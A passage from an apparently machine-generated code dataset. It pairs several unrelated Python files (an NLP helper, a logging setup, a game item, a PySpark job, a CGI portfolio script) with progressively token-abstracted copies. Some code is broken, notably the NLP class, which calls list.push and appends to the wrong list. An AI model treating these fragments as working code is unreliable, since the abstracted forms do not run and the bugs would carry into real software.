[]\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n", "class NlpUtility:\n <docstring token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n\n def get_adjectives(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n", "class NlpUtility:\n <docstring token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n <function token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n", "class NlpUtility:\n <docstring token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n <function token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n <function token>\n", "class NlpUtility:\n <docstring token>\n <function token>\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n <function token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n <function token>\n", "class NlpUtility:\n <docstring token>\n <function token>\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n <function token>\n <function token>\n <function token>\n", "class NlpUtility:\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<class token>\n" ]
false
57
675fbdfd519d00ab10bf613e8abb7338e484fe65
import logging formatter = logging.Formatter("%(asctime)s [%(levelname)s] : %(message)s") log = logging.getLogger("othello") log.setLevel(logging.DEBUG) stream_hander = logging.StreamHandler() stream_hander.setFormatter(formatter) log.addHandler(stream_hander)
[ "import logging\n\n\nformatter = logging.Formatter(\"%(asctime)s [%(levelname)s] : %(message)s\")\n\nlog = logging.getLogger(\"othello\")\nlog.setLevel(logging.DEBUG)\n\nstream_hander = logging.StreamHandler()\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n\n", "import logging\nformatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')\nlog = logging.getLogger('othello')\nlog.setLevel(logging.DEBUG)\nstream_hander = logging.StreamHandler()\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n", "<import token>\nformatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')\nlog = logging.getLogger('othello')\nlog.setLevel(logging.DEBUG)\nstream_hander = logging.StreamHandler()\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n", "<import token>\n<assignment token>\nlog.setLevel(logging.DEBUG)\n<assignment token>\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
58
d7b45e76f150107cd62be160e8938f17dad90623
import pandas as pd from sqlalchemy import create_engine # file = 'testfile.csv' # print(pd.read_csv(file, nrows=5)) with open('testfile_short1.csv', 'r') as original: data = original.read() for i in range(2): with open('testfile_short3.csv', 'a') as modified: modified.write(data)
[ "import pandas as pd\nfrom sqlalchemy import create_engine\n# file = 'testfile.csv'\n\n# print(pd.read_csv(file, nrows=5))\n\nwith open('testfile_short1.csv', 'r') as original: data = original.read()\nfor i in range(2):\n with open('testfile_short3.csv', 'a') as modified: modified.write(data)", "import pandas as pd\nfrom sqlalchemy import create_engine\nwith open('testfile_short1.csv', 'r') as original:\n data = original.read()\nfor i in range(2):\n with open('testfile_short3.csv', 'a') as modified:\n modified.write(data)\n", "<import token>\nwith open('testfile_short1.csv', 'r') as original:\n data = original.read()\nfor i in range(2):\n with open('testfile_short3.csv', 'a') as modified:\n modified.write(data)\n", "<import token>\n<code token>\n" ]
false
59
61454a3d6b5b17bff871ededc6ddfe8384043884
from pythongame.core.buff_effects import get_buff_effect, register_buff_effect, StatModifyingBuffEffect from pythongame.core.common import ItemType, Sprite, BuffType, Millis, HeroStat from pythongame.core.game_data import UiIconSprite, register_buff_text from pythongame.core.game_state import Event, PlayerDamagedEnemy, GameState from pythongame.core.item_effects import AbstractItemEffect from pythongame.core.item_inventory import ItemEquipmentCategory from pythongame.game_data.items.register_items_util import register_custom_effect_item BUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND HEALTH_REGEN_BONUS = 1 BUFF_DURATION = Millis(5000) class ItemEffect(AbstractItemEffect): def item_handle_event(self, event: Event, game_state: GameState): if isinstance(event, PlayerDamagedEnemy): game_state.player_state.gain_buff_effect(get_buff_effect(BUFF_TYPE), BUFF_DURATION) class BuffedByHealingWand(StatModifyingBuffEffect): def __init__(self): super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}) def register_healing_wand_item(): item_type = ItemType.HEALING_WAND register_custom_effect_item( item_type=item_type, item_level=4, ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND, sprite=Sprite.ITEM_HEALING_WAND, image_file_path="resources/graphics/item_healing_wand.png", item_equipment_category=ItemEquipmentCategory.MAIN_HAND, name="Healing wand", custom_description=["When you damage an enemy, gain +" + str(HEALTH_REGEN_BONUS) + " health regen for " + "{:.0f}".format(BUFF_DURATION / 1000) + "s"], stat_modifier_intervals=[], custom_effect=ItemEffect() ) register_buff_effect(BUFF_TYPE, BuffedByHealingWand) register_buff_text(BUFF_TYPE, "Healing wand")
[ "from pythongame.core.buff_effects import get_buff_effect, register_buff_effect, StatModifyingBuffEffect\nfrom pythongame.core.common import ItemType, Sprite, BuffType, Millis, HeroStat\nfrom pythongame.core.game_data import UiIconSprite, register_buff_text\nfrom pythongame.core.game_state import Event, PlayerDamagedEnemy, GameState\nfrom pythongame.core.item_effects import AbstractItemEffect\nfrom pythongame.core.item_inventory import ItemEquipmentCategory\nfrom pythongame.game_data.items.register_items_util import register_custom_effect_item\n\nBUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND\nHEALTH_REGEN_BONUS = 1\nBUFF_DURATION = Millis(5000)\n\n\nclass ItemEffect(AbstractItemEffect):\n\n def item_handle_event(self, event: Event, game_state: GameState):\n if isinstance(event, PlayerDamagedEnemy):\n game_state.player_state.gain_buff_effect(get_buff_effect(BUFF_TYPE), BUFF_DURATION)\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS})\n\n\ndef register_healing_wand_item():\n item_type = ItemType.HEALING_WAND\n register_custom_effect_item(\n item_type=item_type,\n item_level=4,\n ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND,\n sprite=Sprite.ITEM_HEALING_WAND,\n image_file_path=\"resources/graphics/item_healing_wand.png\",\n item_equipment_category=ItemEquipmentCategory.MAIN_HAND,\n name=\"Healing wand\",\n custom_description=[\"When you damage an enemy, gain +\" + str(HEALTH_REGEN_BONUS) + \" health regen for \" +\n \"{:.0f}\".format(BUFF_DURATION / 1000) + \"s\"],\n stat_modifier_intervals=[],\n custom_effect=ItemEffect()\n )\n\n register_buff_effect(BUFF_TYPE, BuffedByHealingWand)\n register_buff_text(BUFF_TYPE, \"Healing wand\")\n", "from pythongame.core.buff_effects import get_buff_effect, register_buff_effect, StatModifyingBuffEffect\nfrom pythongame.core.common import ItemType, Sprite, BuffType, Millis, HeroStat\nfrom pythongame.core.game_data import UiIconSprite, register_buff_text\nfrom pythongame.core.game_state import Event, PlayerDamagedEnemy, GameState\nfrom pythongame.core.item_effects import AbstractItemEffect\nfrom pythongame.core.item_inventory import ItemEquipmentCategory\nfrom pythongame.game_data.items.register_items_util import register_custom_effect_item\nBUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND\nHEALTH_REGEN_BONUS = 1\nBUFF_DURATION = Millis(5000)\n\n\nclass ItemEffect(AbstractItemEffect):\n\n def item_handle_event(self, event: Event, game_state: GameState):\n if isinstance(event, PlayerDamagedEnemy):\n game_state.player_state.gain_buff_effect(get_buff_effect(\n BUFF_TYPE), BUFF_DURATION)\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}\n )\n\n\ndef register_healing_wand_item():\n item_type = ItemType.HEALING_WAND\n register_custom_effect_item(item_type=item_type, item_level=4,\n ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND, sprite=Sprite.\n ITEM_HEALING_WAND, image_file_path=\n 'resources/graphics/item_healing_wand.png', item_equipment_category\n =ItemEquipmentCategory.MAIN_HAND, name='Healing wand',\n custom_description=['When you damage an enemy, gain +' + str(\n HEALTH_REGEN_BONUS) + ' health regen for ' + '{:.0f}'.format(\n BUFF_DURATION / 1000) + 's'], stat_modifier_intervals=[],\n custom_effect=ItemEffect())\n register_buff_effect(BUFF_TYPE, BuffedByHealingWand)\n register_buff_text(BUFF_TYPE, 'Healing wand')\n", "<import token>\nBUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND\nHEALTH_REGEN_BONUS = 1\nBUFF_DURATION = Millis(5000)\n\n\nclass ItemEffect(AbstractItemEffect):\n\n def item_handle_event(self, event: Event, game_state: GameState):\n if isinstance(event, PlayerDamagedEnemy):\n game_state.player_state.gain_buff_effect(get_buff_effect(\n BUFF_TYPE), BUFF_DURATION)\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}\n )\n\n\ndef register_healing_wand_item():\n item_type = ItemType.HEALING_WAND\n register_custom_effect_item(item_type=item_type, item_level=4,\n ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND, sprite=Sprite.\n ITEM_HEALING_WAND, image_file_path=\n 'resources/graphics/item_healing_wand.png', item_equipment_category\n =ItemEquipmentCategory.MAIN_HAND, name='Healing wand',\n custom_description=['When you damage an enemy, gain +' + str(\n HEALTH_REGEN_BONUS) + ' health regen for ' + '{:.0f}'.format(\n BUFF_DURATION / 1000) + 's'], stat_modifier_intervals=[],\n custom_effect=ItemEffect())\n register_buff_effect(BUFF_TYPE, BuffedByHealingWand)\n register_buff_text(BUFF_TYPE, 'Healing wand')\n", "<import token>\n<assignment token>\n\n\nclass ItemEffect(AbstractItemEffect):\n\n def item_handle_event(self, event: Event, game_state: GameState):\n if isinstance(event, PlayerDamagedEnemy):\n game_state.player_state.gain_buff_effect(get_buff_effect(\n BUFF_TYPE), BUFF_DURATION)\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}\n )\n\n\ndef register_healing_wand_item():\n item_type = ItemType.HEALING_WAND\n register_custom_effect_item(item_type=item_type, item_level=4,\n ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND, sprite=Sprite.\n ITEM_HEALING_WAND, image_file_path=\n 'resources/graphics/item_healing_wand.png', item_equipment_category\n =ItemEquipmentCategory.MAIN_HAND, name='Healing wand',\n custom_description=['When you damage an enemy, gain +' + str(\n HEALTH_REGEN_BONUS) + ' health regen for ' + '{:.0f}'.format(\n BUFF_DURATION / 1000) + 's'], stat_modifier_intervals=[],\n custom_effect=ItemEffect())\n register_buff_effect(BUFF_TYPE, BuffedByHealingWand)\n register_buff_text(BUFF_TYPE, 'Healing wand')\n", "<import token>\n<assignment token>\n\n\nclass ItemEffect(AbstractItemEffect):\n\n def item_handle_event(self, event: Event, game_state: GameState):\n if isinstance(event, PlayerDamagedEnemy):\n game_state.player_state.gain_buff_effect(get_buff_effect(\n BUFF_TYPE), BUFF_DURATION)\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}\n )\n\n\n<function token>\n", "<import token>\n<assignment token>\n\n\nclass ItemEffect(AbstractItemEffect):\n <function token>\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}\n )\n\n\n<function token>\n", "<import token>\n<assignment token>\n<class token>\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}\n )\n\n\n<function token>\n", "<import token>\n<assignment token>\n<class token>\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<class token>\n<class token>\n<function token>\n" ]
false
60
4c60fd123f591bf2a88ca0affe14a3c3ec0d3cf6
from pyspark import SparkContext from pyspark.sql import SQLContext from pyspark.sql.types import * sc = SparkContext("local", "weblog app") effective_care = sc.textFile('file:///data/exercise1/effective_care').map(lambda l:l.encode().split(',')).map(lambda x: (x[0], x[1:])) procedure_care = effective_care.map(lambda p:(p[1][1], [p[0], p[1][2]])) procedure_care_grouped = procedure_care.groupByKey() def range_func(measures): scores = [] for entry in measures: try: curr = int(entry[1]) except: curr = None if curr is not None: scores.append(curr) if len(scores) < 1: return 0 return max(scores) - min(scores) measure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda l:l.encode().split(',')).map(lambda x: (x[1], x[0])) procedure_score_range = procedure_care_grouped.map(lambda p:(p[0], range_func(p[1]))).join(measure_dates) sorted_ranges = procedure_score_range.sortBy(lambda x:x[1], False) top = sorted_ranges.take(10) print(top)
[ "from pyspark import SparkContext\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.types import *\nsc = SparkContext(\"local\", \"weblog app\")\n\neffective_care = sc.textFile('file:///data/exercise1/effective_care').map(lambda l:l.encode().split(',')).map(lambda x: (x[0], x[1:]))\nprocedure_care = effective_care.map(lambda p:(p[1][1], [p[0], p[1][2]]))\nprocedure_care_grouped = procedure_care.groupByKey()\n\ndef range_func(measures):\n\tscores = []\n\tfor entry in measures:\n\t\ttry:\n\t\t\tcurr = int(entry[1])\n\t\texcept:\n\t\t\tcurr = None\n\t\tif curr is not None:\n\t\t\tscores.append(curr)\n\tif len(scores) < 1:\n\t\treturn 0\n\treturn max(scores) - min(scores)\n\nmeasure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda l:l.encode().split(',')).map(lambda x: (x[1], x[0]))\nprocedure_score_range = procedure_care_grouped.map(lambda p:(p[0], range_func(p[1]))).join(measure_dates)\nsorted_ranges = procedure_score_range.sortBy(lambda x:x[1], False)\ntop = sorted_ranges.take(10)\nprint(top)\n", "from pyspark import SparkContext\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.types import *\nsc = SparkContext('local', 'weblog app')\neffective_care = sc.textFile('file:///data/exercise1/effective_care').map(\n lambda l: l.encode().split(',')).map(lambda x: (x[0], x[1:]))\nprocedure_care = effective_care.map(lambda p: (p[1][1], [p[0], p[1][2]]))\nprocedure_care_grouped = procedure_care.groupByKey()\n\n\ndef range_func(measures):\n scores = []\n for entry in measures:\n try:\n curr = int(entry[1])\n except:\n curr = None\n if curr is not None:\n scores.append(curr)\n if len(scores) < 1:\n return 0\n return max(scores) - min(scores)\n\n\nmeasure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda\n l: l.encode().split(',')).map(lambda x: (x[1], x[0]))\nprocedure_score_range = procedure_care_grouped.map(lambda p: (p[0],\n range_func(p[1]))).join(measure_dates)\nsorted_ranges = procedure_score_range.sortBy(lambda x: x[1], False)\ntop = sorted_ranges.take(10)\nprint(top)\n", "<import token>\nsc = SparkContext('local', 'weblog app')\neffective_care = sc.textFile('file:///data/exercise1/effective_care').map(\n lambda l: l.encode().split(',')).map(lambda x: (x[0], x[1:]))\nprocedure_care = effective_care.map(lambda p: (p[1][1], [p[0], p[1][2]]))\nprocedure_care_grouped = procedure_care.groupByKey()\n\n\ndef range_func(measures):\n scores = []\n for entry in measures:\n try:\n curr = int(entry[1])\n except:\n curr = None\n if curr is not None:\n scores.append(curr)\n if len(scores) < 1:\n return 0\n return max(scores) - min(scores)\n\n\nmeasure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda\n l: l.encode().split(',')).map(lambda x: (x[1], x[0]))\nprocedure_score_range = procedure_care_grouped.map(lambda p: (p[0],\n range_func(p[1]))).join(measure_dates)\nsorted_ranges = procedure_score_range.sortBy(lambda x: x[1], False)\ntop = sorted_ranges.take(10)\nprint(top)\n", "<import token>\n<assignment token>\n\n\ndef range_func(measures):\n scores = []\n for entry in measures:\n try:\n curr = int(entry[1])\n except:\n curr = None\n if curr is not None:\n scores.append(curr)\n if len(scores) < 1:\n return 0\n return max(scores) - min(scores)\n\n\n<assignment token>\nprint(top)\n", "<import token>\n<assignment token>\n\n\ndef range_func(measures):\n scores = []\n for entry in measures:\n try:\n curr = int(entry[1])\n except:\n curr = None\n if curr is not None:\n scores.append(curr)\n if len(scores) < 1:\n return 0\n return max(scores) - min(scores)\n\n\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n<function token>\n<assignment token>\n<code token>\n" ]
false
61
4264cba9a6c39219d21bd21d4b21009bacd1db38
#!/usr/bin/python import operator import cgi, sys, LINK_HEADERS import simplejson as json from datetime import datetime from dateutil import tz from decimal import * sys.path.insert(0, str(LINK_HEADERS.DAO_LINK)) from transaction_dao import Transaction_dao from user_portfolio_dao import User_portfolio_dao from user_stock_value_dao import User_stock_value_dao from company_dao import Company_dao from history_dao import History_dao from sector_info_dao import Sector_info_dao print "Content-Type: text/html\r\n\r\n" form = cgi.FieldStorage() if form.getvalue("username") != None: username = form.getvalue("username") if form.getvalue("filter") != None: portfolio_filter = form.getvalue("filter") if portfolio_filter == '1': filter_flag = "ALL" elif portfolio_filter == '2': filter_flag = "ALGOS" elif portfolio_filter == '0': filter_flag = "USER" else: filter_flag = portfolio_filter tdao = Transaction_dao() u2 = User_stock_value_dao() u1 = User_portfolio_dao() cdao = Company_dao() hdao = History_dao() data={} if filter_flag == "ALL": t = hdao.select_all(username) l = tdao.get_user_stock_list(username) elif filter_flag == "ALGOS": t = hdao.select_all_algo_trades(username) l = tdao.get_all_algo_stock_list(username) elif filter_flag == "USER": t = hdao.select_all_user_trades(username) l = tdao.get_only_user_stock_list(username) else: t = hdao.select_algo_trades(username, filter_flag) l = tdao.get_algo_stock_list(username, filter_flag) # HISTORY if t: data['transactions']={} for i in range(len(t)): data['transactions'][i]={} #start date formatting from_zone = tz.tzutc() to_zone = tz.tzlocal() date_time = t[i].get_trans_date() date_time = date_time.strftime('%Y-%m-%d %H:%M:%S') date_time = datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S') date_time = date_time.replace(tzinfo=from_zone) updated_date_time = date_time.astimezone(to_zone) updated_date_time = updated_date_time.strftime('%Y-%m-%d %H:%M:%S') #end date formatting data['transactions'][i]['trans_date'] = updated_date_time data['transactions'][i]['trans_type'] = t[i].get_trans_type() # try: # data['transactions'][i]['name']=cdao.get_company_model(t[i].get_stock()).get_name() # except: # data['transactions'][i]['name']="" data['transactions'][i]['stock'] = t[i].get_stock() data['transactions'][i]['price'] = t[i].get_price() data['transactions'][i]['total_price'] = t[i].get_total_price() data['transactions'][i]['volume'] = t[i].get_volume() else: data['transactions']={} data['transactions'][0]={} data['transactions'][0]['trans_date'] = "" data['transactions'][0]['trans_type'] = "" data['transactions'][0]['name']="" data['transactions'][0]['stock'] = "" data['transactions'][0]['price'] = "" data['transactions'][0]['total_price'] = "" data['transactions'][0]['volume'] = "" # OWNED STOCKS sector_dao=Sector_info_dao() data['sector_volume']={} if l: data['owned_stocks']={} #total_stock_value = 0 # for i in range(len(l)): # c = cdao.get_company_model(l[i]) c = cdao.get_list_of_company_models(l) if c: for i in range(len(c)): try: o = tdao.get_owned_stock_model(username, c[i].get_symbol(), c[i].get_ask()) except: continue data['owned_stocks'][i]={} data['owned_stocks'][i]['name']=c[i].get_name() data['owned_stocks'][i]['stock'] = c[i].get_symbol() data['owned_stocks'][i]['current_shares'] = o.get_volume() data['owned_stocks'][i]['current_price'] = c[i].get_ask() data['owned_stocks'][i]['total_worth'] = o.get_total_worth() data['owned_stocks'][i]['profit'] = o.get_profit() #total_stock_value = Decimal(total_stock_value) + Decimal(o.get_total_worth()) #--------Code for chart - sector_volume:--- volume=o.get_volume() symbol=c[i].get_symbol() try: sector=sector_dao.get_sector_by_symbol(symbol) if(sector.strip()==''):sector="Other" except: sector="Other" if(sector not in data['sector_volume']): data['sector_volume'][sector]=volume; else: data['sector_volume'][sector]+=volume; #----------end of code for chart-------- else: data['owned_stocks']={} data['owned_stocks'][0]={} data['owned_stocks'][0]['name'] ="" data['owned_stocks'][0]['stock'] = "" data['owned_stocks'][0]['current_shares'] = "" data['owned_stocks'][0]['current_price'] = "" data['owned_stocks'][0]['total_worth'] = "" data['owned_stocks'][0]['profit'] = "" # PORTFOLIO INFORMATION #---------------------Code for Chart Generation----------------------------- sectors=[] volume=[] sorted_volume=sorted(data['sector_volume'].items(),key=operator.itemgetter(1)) length=len(sorted_volume); #Insertion Sort for i in range(length): j=i while(j>0 and sorted_volume[j][1]>sorted_volume[j-1][1]): temp=sorted_volume[j-1] sorted_volume[j-1]=sorted_volume[j] sorted_volume[j]=temp j=j-1 MAX=35 for i in range(length): if(i>=MAX):break; if(sorted_volume[i][0]=='Other'):continue sectors.append(sorted_volume[i][0]) volume.append(sorted_volume[i][1]) data['chart_axis']=sectors; data['chart_data']=volume; #--------------------------------end of code for chart--------------------# up = u1.get_user_portfolio_model(username) usv = u2.get_user_stock_value_model(username) data['users']={} if up: data['users']['total_portfolio'] = up.get_total_portfolio() data['users']['total_deposited'] = up.get_total_deposited() data['users']['available_funds'] = up.get_available_funds() else: data['users']['total_portfolio'] = 0 data['users']['total_deposited'] = 0 data['users']['available_funds'] = 0 if usv: data['users']['total_stock_values'] = usv.get_total_stock_values() data['users']['profit'] = usv.get_profit() else: data['users']['total_stock_values'] = 0 data['users']['profit'] = 0 #----------------------------------code owned Stocks chart-----------------------------# owned_stocks=data['owned_stocks'] owned_stocks_graph_data={} sorted_owned_stocks_chart_axis=[] sorted_owned_stocks_chart_value=[] for i in owned_stocks: owned_stocks_graph_data[owned_stocks[i]['stock']]=owned_stocks[i]['total_worth'] length=len(owned_stocks_graph_data); sorted_data=sorted(owned_stocks_graph_data.items(),key=operator.itemgetter(1)) for i in range(length-1,-1,-1): if(length-i>MAX):break sorted_owned_stocks_chart_axis.append(sorted_data[i][0]) sorted_owned_stocks_chart_value.append(sorted_data[i][1]) data['owned_stocks_chart_axis']=sorted_owned_stocks_chart_axis; data['owned_stocks_chart_value']=sorted_owned_stocks_chart_value; json_result = json.dumps(data) print json_result
[ "#!/usr/bin/python\n\nimport operator\nimport cgi, sys, LINK_HEADERS\nimport simplejson as json\nfrom datetime import datetime\nfrom dateutil import tz\nfrom decimal import *\nsys.path.insert(0, str(LINK_HEADERS.DAO_LINK))\nfrom transaction_dao import Transaction_dao\nfrom user_portfolio_dao import User_portfolio_dao\nfrom user_stock_value_dao import User_stock_value_dao\nfrom company_dao import Company_dao\nfrom history_dao import History_dao\nfrom sector_info_dao import Sector_info_dao\nprint \"Content-Type: text/html\\r\\n\\r\\n\"\n\nform = cgi.FieldStorage()\n\nif form.getvalue(\"username\") != None:\n username = form.getvalue(\"username\")\nif form.getvalue(\"filter\") != None:\n portfolio_filter = form.getvalue(\"filter\")\n\n if portfolio_filter == '1':\n filter_flag = \"ALL\"\n elif portfolio_filter == '2':\n filter_flag = \"ALGOS\"\n elif portfolio_filter == '0':\n filter_flag = \"USER\"\n else:\n filter_flag = portfolio_filter\n \ntdao = Transaction_dao()\nu2 = User_stock_value_dao()\nu1 = User_portfolio_dao()\ncdao = Company_dao()\nhdao = History_dao()\n\ndata={}\n\nif filter_flag == \"ALL\":\n t = hdao.select_all(username)\n l = tdao.get_user_stock_list(username)\nelif filter_flag == \"ALGOS\":\n t = hdao.select_all_algo_trades(username)\n l = tdao.get_all_algo_stock_list(username)\nelif filter_flag == \"USER\":\n t = hdao.select_all_user_trades(username)\n l = tdao.get_only_user_stock_list(username)\nelse:\n t = hdao.select_algo_trades(username, filter_flag)\n l = tdao.get_algo_stock_list(username, filter_flag)\n\n\n# HISTORY\nif t:\n data['transactions']={}\n \n for i in range(len(t)):\n data['transactions'][i]={}\n\t\n\t #start date formatting\n from_zone = tz.tzutc()\n to_zone = tz.tzlocal()\n date_time = t[i].get_trans_date()\n date_time = date_time.strftime('%Y-%m-%d %H:%M:%S')\n date_time = datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S')\t\n date_time = date_time.replace(tzinfo=from_zone)\n updated_date_time = date_time.astimezone(to_zone)\n updated_date_time = updated_date_time.strftime('%Y-%m-%d %H:%M:%S')\n\t #end date formatting\t\n\n data['transactions'][i]['trans_date'] = updated_date_time\n data['transactions'][i]['trans_type'] = t[i].get_trans_type()\n\n# try:\n# data['transactions'][i]['name']=cdao.get_company_model(t[i].get_stock()).get_name()\n# except:\n# data['transactions'][i]['name']=\"\"\n \n data['transactions'][i]['stock'] = t[i].get_stock()\n data['transactions'][i]['price'] = t[i].get_price()\n data['transactions'][i]['total_price'] = t[i].get_total_price()\n data['transactions'][i]['volume'] = t[i].get_volume()\nelse:\n data['transactions']={}\n data['transactions'][0]={}\n data['transactions'][0]['trans_date'] = \"\"\n data['transactions'][0]['trans_type'] = \"\"\n data['transactions'][0]['name']=\"\"\n data['transactions'][0]['stock'] = \"\"\n data['transactions'][0]['price'] = \"\"\n data['transactions'][0]['total_price'] = \"\"\n data['transactions'][0]['volume'] = \"\"\n \n\n\n# OWNED STOCKS\nsector_dao=Sector_info_dao()\ndata['sector_volume']={}\nif l:\n \n data['owned_stocks']={}\n #total_stock_value = 0\n \n# for i in range(len(l)):\n# c = cdao.get_company_model(l[i])\n \n c = cdao.get_list_of_company_models(l)\n if c:\n for i in range(len(c)):\n try:\n o = tdao.get_owned_stock_model(username, c[i].get_symbol(), c[i].get_ask()) \n except:\n continue\n \n data['owned_stocks'][i]={}\n data['owned_stocks'][i]['name']=c[i].get_name()\n data['owned_stocks'][i]['stock'] = c[i].get_symbol()\n data['owned_stocks'][i]['current_shares'] = o.get_volume()\n data['owned_stocks'][i]['current_price'] = c[i].get_ask()\n data['owned_stocks'][i]['total_worth'] = o.get_total_worth()\n data['owned_stocks'][i]['profit'] = o.get_profit()\n #total_stock_value = Decimal(total_stock_value) + Decimal(o.get_total_worth())\n\n #--------Code for chart - sector_volume:---\n volume=o.get_volume()\n symbol=c[i].get_symbol()\n try:\n sector=sector_dao.get_sector_by_symbol(symbol)\n if(sector.strip()==''):sector=\"Other\"\n except:\n sector=\"Other\"\n\n if(sector not in data['sector_volume']):\n data['sector_volume'][sector]=volume;\n else:\n data['sector_volume'][sector]+=volume;\n #----------end of code for chart--------\n \nelse:\n data['owned_stocks']={}\n data['owned_stocks'][0]={}\n data['owned_stocks'][0]['name'] =\"\"\n data['owned_stocks'][0]['stock'] = \"\"\n data['owned_stocks'][0]['current_shares'] = \"\"\n data['owned_stocks'][0]['current_price'] = \"\"\n data['owned_stocks'][0]['total_worth'] = \"\"\n data['owned_stocks'][0]['profit'] = \"\"\n\n# PORTFOLIO INFORMATION\n#---------------------Code for Chart Generation-----------------------------\nsectors=[]\nvolume=[]\n\nsorted_volume=sorted(data['sector_volume'].items(),key=operator.itemgetter(1))\nlength=len(sorted_volume);\n\n#Insertion Sort\nfor i in range(length):\n j=i\n while(j>0 and sorted_volume[j][1]>sorted_volume[j-1][1]):\n temp=sorted_volume[j-1]\n sorted_volume[j-1]=sorted_volume[j]\n sorted_volume[j]=temp\n j=j-1\n\nMAX=35\nfor i in range(length):\n if(i>=MAX):break;\n if(sorted_volume[i][0]=='Other'):continue\n sectors.append(sorted_volume[i][0])\n volume.append(sorted_volume[i][1])\n\n\ndata['chart_axis']=sectors;\ndata['chart_data']=volume;\n#--------------------------------end of code for chart--------------------#\n\nup = u1.get_user_portfolio_model(username)\nusv = u2.get_user_stock_value_model(username)\ndata['users']={}\n\nif up:\n data['users']['total_portfolio'] = up.get_total_portfolio()\n data['users']['total_deposited'] = up.get_total_deposited()\n data['users']['available_funds'] = up.get_available_funds()\nelse:\n data['users']['total_portfolio'] = 0\n data['users']['total_deposited'] = 0\n data['users']['available_funds'] = 0 \n\nif usv:\n data['users']['total_stock_values'] = usv.get_total_stock_values()\n data['users']['profit'] = usv.get_profit() \nelse:\n data['users']['total_stock_values'] = 0\n data['users']['profit'] = 0\n \n\n\n\n\n#----------------------------------code owned Stocks chart-----------------------------#\n\nowned_stocks=data['owned_stocks']\nowned_stocks_graph_data={}\n\nsorted_owned_stocks_chart_axis=[]\nsorted_owned_stocks_chart_value=[]\n\nfor i in owned_stocks:\n 